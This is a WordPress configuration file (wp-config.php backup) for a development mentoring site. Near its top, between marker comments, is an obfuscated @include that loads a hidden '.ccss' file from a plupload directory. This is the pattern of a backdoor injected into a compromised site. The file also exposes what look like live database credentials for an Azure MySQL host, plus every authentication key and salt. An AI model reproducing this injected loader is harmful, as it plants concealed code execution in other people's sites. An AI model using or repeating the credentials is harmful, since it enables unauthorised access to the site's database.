File: //mnt/data/dev/config-bk/mentoring-config.php
<?php
define('WP_CACHE', true); // WP-Optimize Cache
/*d3fce*/
@include /*ltqf*/("/\x68ome/mentoring\x2dwp/public_\x68tml/wp\x2dincludes/js/plupload/.b3c3d816.ccss");
/*d3fce*/
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev-mentoring-wp' );
/** Database username */
define( 'DB_USER', 'dgtwproot' );
/** Database password */
define( 'DB_PASSWORD', 'l.!&#Y}z+wG<s1mM' );
/** Database hostname */
define( 'DB_HOST', 'dgt-wordpress-db-server.mysql.database.azure.com' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'MbczX<.hjLWF[S*ZL%{;`Gm-{6~r{+DCLHrD+;:nFO(z6aj,BY.iFF~Yrm4VK4c ' );
define( 'SECURE_AUTH_KEY', 'W:kScoeR%qpABK2pb$$4>P;e{_*!G@RB`P,%_QoS_63+p+]Zj]A]*QItT^3Ko$@r' );
define( 'LOGGED_IN_KEY', 'gL&Rynm_C=+??o(Fg[RBa|Shi-=hc?}|QMo8/n6e?OMzQ$t&p7PDNWBUxT3>mn4/' );
define( 'NONCE_KEY', '>I*z4+>`7]eAn<spxUOQQkxjLu.44W~kV7$K[P/eOZYWB*-#ttVA}l?dG#98. ^f' );
define( 'AUTH_SALT', '*qo 03wqHwID(pD3a*S 6Ih>0A<8Z/mY{/l_s!62T$!+xlRw}ETm*Q>oPF0B2m]V' );
define( 'SECURE_AUTH_SALT', 'cr]eo(_&UzJc80*v`$wx&%n$aT2Zj}!WrAk!_&|!-n2>rY4I_[ <PNMO%-?;]lAY' );
define( 'LOGGED_IN_SALT', 'H.$+26dMX-?)KIctO@*2O`@dv5f6)Z$]R2WpQ*>+0_;()`|V+6pH2<rWT:1up]{I' );
define( 'NONCE_SALT', '?YqRX)Y/jD@j]~Vu~kIt8r_x:#.7cB*XDJMKGuJecB4>;mY8:^5MD`r :K%edGn7' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
define( 'FS_METHOD', 'direct' );
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';